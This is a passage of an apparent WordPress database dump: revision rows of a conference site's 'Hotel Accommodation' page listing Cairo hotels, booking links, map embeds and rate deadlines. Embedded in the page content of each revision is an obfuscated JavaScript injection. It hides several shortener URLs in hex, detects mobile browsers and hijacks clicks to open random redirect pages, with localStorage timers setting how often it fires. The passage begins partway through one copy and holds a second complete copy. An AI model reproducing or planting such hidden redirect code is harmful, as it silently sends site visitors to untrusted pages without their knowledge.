_0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-25 19:15:36','2023-06-25 19:15:36','',2685,'https://gsw2023.com/?p=4844',0,'revision','',0),
(4845,4,'2023-06-25 19:16:15','2023-06-25 19:16:15','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 class=\"cmp-teaser__title\" style=\"text-align: center;\"><span style=\"color: #3366ff;\">InterContinental Cairo Semiramis</span></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_btn title=\"BOOK NOW\" style=\"custom\" custom_background=\"#4169e1\" custom_text=\"#ffffff\" align=\"center\" button_block=\"true\" link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"][ultimate_exp_section][/ultimate_exp_section][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xNCUyMTFtOCUyMTFtMyUyMTFkODYzLjQ0NTk0ODY2NjA1NDMlMjEyZDMxLjIzMTk4OTk5OTk5OTk5NiUyMTNkMzAuMDQzMDYlMjEzbTIlMjExaTEwMjQlMjEyaTc2OCUyMTRmMTMuMSUyMTNtMyUyMTFtMiUyMTFzMHgxNDU4NDBjZjExOGU2MWNmJTI1M0EweGFmNGFlZTFhNTU5ODY1M2QlMjEyc0ludGVyQ29udGluZW50YWwlMjUyMENhaXJvJTI1MjBTZW1pcmFtaXMlMjUyQyUyNTIwYW4lMjUyMElIRyUyNTIwSG90ZWwlMjE1ZTAlMjEzbTIlMjExc2VuJTIxMnNlZyUyMTR2MTY4NzcyMDQ1NTgzNSUyMTVtMiUyMTFzZW4lMjEyc2VnJTIyJTIwd2lkdGglM0QlMjI2MDAlMjIlMjBoZWlnaHQlM0QlMjI0NTAlMjIlMjBzdHlsZSUzRCUyMmJvcmRlciUzQTAlM0IlMjIlMjBhbGxvd2Z1bGxzY3JlZW4lM0QlMjIlMjIlMjBsb2FkaW5nJTNEJTIybGF6eSUyMiUyMHJlZmVycmVycG9saWN5JTNEJTIybm8tcmVmZXJyZXItd2hlbi1kb3duZ3JhZGUlMjIlM0UlM0MlMkZpZnJhbWUlM0U=\"][/vc_column][vc_column width=\"1/2\"][dt_media_gallery_carousel image_border_radius=\"0px\" slides_on_wide_desk=\"1\" slides_on_desk=\"1\" slides_on_lapt=\"1\" slides_on_h_tabs=\"1\" slides_on_v_tabs=\"1\" stage_padding=\"10\" autoplay=\"y\" autoplay_speed=\"3000\" project_icon_color=\"#ffffff\" project_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" show_bullets=\"y\" bullets_h_offset=\"0px\" include=\"4833,4791\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-25 19:16:15','2023-06-25 19:16:15','',2685,'https://gsw2023.com/?p=4845',0,'revision','',0),
(4846,4,'2023-06-25 19:23:38','2023-06-25 19:23:38','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" 